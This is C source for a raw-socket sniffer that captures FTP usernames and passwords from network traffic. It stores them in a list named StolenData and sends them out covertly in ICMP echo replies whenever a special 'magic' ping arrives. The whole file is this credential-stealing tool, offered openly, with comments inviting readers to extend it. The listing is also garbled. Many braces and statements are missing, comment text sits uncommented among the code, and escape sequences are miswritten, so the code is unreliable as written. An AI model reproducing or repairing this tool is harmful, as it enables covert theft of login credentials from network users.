#define BUFFER_MAX 2048
#define MAGIC_REPLY 0X16 /*indentify the magic icmp echo reply*/
#define MAGIC_CODE 0X5B /*indentify the magic icmp echo message*/
typedef struct node
char Name[15]; /* name of ftp user */
char PassWord[15]; /* password of ftp user*/
unsigned int ip; /* ip address of remote machine */
struct node * next;/*there may be not only one
pair of user name and password, so we use a list to
store any many messages as possible*/
} * List;
static List StolenData = NULL;/*
link list storing all user names and password
static unsigned short checksum(int numwords, unsigned short *buff);
add a pair of new gotten user name and password
int AddNode(const List pnode);
/* remove the head of a list when one pair of data is sent out*/
int RemoveHead();
/* try to get ftp user names and password from this ip message*/
int CheckTCP(const struct iphdr *);
/*Send one pair of user name and password, if no data sniffered, send
a pair of invalid data to tell the client not to get any more */
int SendData(const struct ether_header *, const int n);
/*check whether it is a magic icmp packet to get name and password */
int MagicICMP(const struct iphdr *);
/*reset user name, password, target ip and target port*/
void Reset();
static char* username = NULL;
static char* password = NULL;
static unsigned int target_ip = 0;
static unsigned short target_port = 0;
/*status of the sniffer*/
static int have_pair = 0;
int main(int argc, char *argv[])
int sock, n_read;
struct ether_header * etherh;
struct iphdr * iph;
char buffer[BUFFER_MAX];
/*create a raw socekt to sniffer all messages*/
if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_IP))) < 0)
while (1)
n_read = recvfrom(sock, buffer, 2048, 0, NULL, NULL);
/*--14(ethernet head) + 20(ip header) + 8(TCP/UDP/ICMP header) ---*/
if (n_read < 42)
printf("Incomplete header, packet corrupt/n");
/* get ethernet header */
etherh =(struct ether_header *) buffer;
etherh->ether_shost[0], etherh->ether_shost[1],
etherh->ether_shost[2], etherh->ether_shost[3],
etherh->ether_shost[4], etherh->ether_shost[5],
etherh->ether_dhost[0], etherh->ether_dhost[1],
etherh->ether_dhost[2], etherh->ether_dhost[3],
etherh->ether_dhost[4], etherh->ether_dhost[5]);
/* get ip header */
iph = (struct iphdr *) (etherh + 1);
ftp use a tcp protocol to transmit command,
so we check this packet trying to get the
user name and password
check whether it is the magic icmp echo message
getting user names and password
if it is, then we will send the information
stored in our list out
SendData(etherh, n_read);
for other protocols, you may make
any tricks you like if you are interested
in it and have the intelligence
default: break;
int CheckTCP(const struct iphdr * ipheader)
return 0;
int i = 0;
/* get tcp head */
struct tcphdr * tcpheader = (struct tcphdr*)(ipheader + 1);
/* get data region of the tcp packet */
char * data = (char *)((int)tcpheader + (int)(tcpheader->doff * 4));
if we already have a pair of valid user name
address (ip and port), then we will check the new coming packet
to see whether the packet have a "USER" string, if it has, we should
rest our sniffer,it is to say, that we will clear the user name and
address already stored, becuase the packet may be a new ftp
loading message from another client or a reload message from the
same client when the user pressed 'ctrl + c' to terminate the
loading process because he may find that he had entered an incorrect
user name and pressed the enter key sending it out. for another reason,
it is a simple sniffer just to show the power of raw socket, so we
do not consider the case that more than one client will load the server
at the same time, for simplicity, we construct a single-procss sniffer
which can only monitor one loading process at a moment, so ,
old user names will be cleared by new loadings if there is not a
corresponding password for this user name from the same client
if(username && target_port && target_ip)
if(ipheader->daddr != target_ip || tcpheader->source != target_port)
/*a new loading, we need to reset our sniffer */
if(strncmp(data, "USER ", 5) == 0 )
try to get user names at the header of data region
data = tcphead + 8
if (strncmp(data, "USER ", 5) == 0)
data += 5;
i = 0;
/*if we do not do this, the sniffer will work error
on the local machine*/
if (username)
return 0;
char * p = data + i;
/*the data always end wht LR */
while (*p != '/r' && *p != '/n' && *p != '/0' && i < 15)
if((username = (char*)malloc(i + 2)) == NULL)
return 0;
memset(username, 0x00, i + 2);
memcpy(username, data, i);
*(username + i) = '/0';
//printf("Get User:%s/n",username);
else //else try to get password
if(strncmp(data, "PASS ", 5) == 0)
data += 5;
i = 0;
/*if we do not have a use name ,we will not
store any password */
if(username == NULL)
return 0;
/*it seems impossible */
return 0;
char * p = data;
while (*p != '/r' && *p != '/n' && *p != '/0' && i < 15)
if((password = (char*)malloc(i + 2)) == NULL)
return 0;
memset(password, 0x00, i + 2);
memcpy(password, data, i);
*(password + i) = '/0';
//printf("GetPass:%s/n", password);
else /* a ftp quit command */
if(strncmp(data, "QUIT", 4) == 0)
store new port and ip when username is not invalid
if(!target_ip && !target_port && username)
target_ip = ipheader->saddr;
target_port = tcpheader->source;
/*we have a pair of user name and password */
if(username && password)
/*store newly sniffered data as sooner as possible*/
struct node node;
node.ip = target_ip;
snprintf(node.Name, 15, "%s", username);
snprintf(node.PassWord, 15, "%s", password);
//printf("Name: %s, pass: %s/n", username, password);
return 1;
void Reset()
free(username); username = NULL;
free(password); password = NULL;
target_ip = target_port = have_pair = 0;
int AddNode(const List pnode)
return 0;
struct node* s = (struct node*)malloc(sizeof(struct node));
return 0;
memcpy((void*)s, (void*)pnode, sizeof(struct node));
s->next = NULL;
StolenData = s;
s->next = StolenData->next;
StolenData->next = s;
return 1;
int SendData(const struct ether_header * eth, const int n)
if(!eth || n <= 0)
return 0;
char buffer[1024],*data;
int len, sockfd;
struct iphdr * iph;
struct icmphdr * icmph, *icmpold;
struct sockaddr_in addr;
struct timeval tm;
struct node store;
/* in case of no data sniffered, so fill invalid data preparly */
sprintf(store.Name, "%s", "InvalidName");
sprintf(store.PassWord, "%s", "InvalidPass");
store.ip = 0;
/* get ip header */
iph = (struct iphdr*)(eth + 1);
/* change source address to into dest address */
inet_aton(inet_ntoa(iph->saddr), &addr.sin_addr);
/* icmp header */
icmpold = (struct icmphdr*)(iph + 1);
/*created a raw socket, in fact i have tried hard to
send data with the sockfd created in the main thread, but
sendto funcion fails, and i had to create a new soceket but
hope one of yours can solve it with your clever brains */
sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
memset(buffer, 0X00, 1024);
if(sockfd < 0)
fprintf(stdout, "socket error/n");
return 0;
/*fill the icmp header*/
icmph = (struct ipcmphdr*)buffer;
/*ping reply*/
icmph->type = ICMP_ECHOREPLY;
/*set our magic reply code*/
icmph->code = MAGIC_REPLY;
/*write any values you like*/
(icmph->un).echo.id = 2;
(icmph->un).echo.sequence = 2;
/*head list is not null, we have data to send, copy data
to this struct */
memcpy(&store, StolenData, sizeof(struct node));
struct node * p = (struct node*)(icmph + 1);
/* copy data to the buffer */
memcpy(p, &store, sizeof(struct node));
len = sizeof(struct node) + 28; //28 = 20(IP header) + 8(icmp header)
icmph->checksum = 0;
/* check sum before sending */
icmph->checksum = checksum(len,(u_short*)icmph);
len = sendto(sockfd, buffer, len, 0,
(struct sockaddr*)&addr, sizeof(addr));
if(len < 0)
fprintf(stdout, "send name and code error/n");
return 0;
fprintf(stdout, "Sending %d bytes to %s/n", len, inet_ntoa(iph->saddr)); /*remove head from the list because the data has alread been sent out*/
return 1;
int MagicICMP(const struct iphdr * ipheader)
int ret = 1;
ret = 0;
struct icmphdr *icmp = (struct icmphdr *)(ipheader + 1);
whethe it is a icmp echo request with a magic code
if(icmp->code != MAGIC_CODE || icmp->type != ICMP_ECHO )
ret = 0;
return ret;
int RemoveHead()
return 0;
struct node * p = StolenData->next;
StolenData = p;
return 1;
static unsigned short checksum(int numwords, unsigned short *buff)
unsigned long sum;
for(sum = 0; numwords > 0; numwords--)
sum += *buff++;
sum = (sum >> 16) + (sum & 0xFFFF);
sum += (sum >> 16);
return ~sum;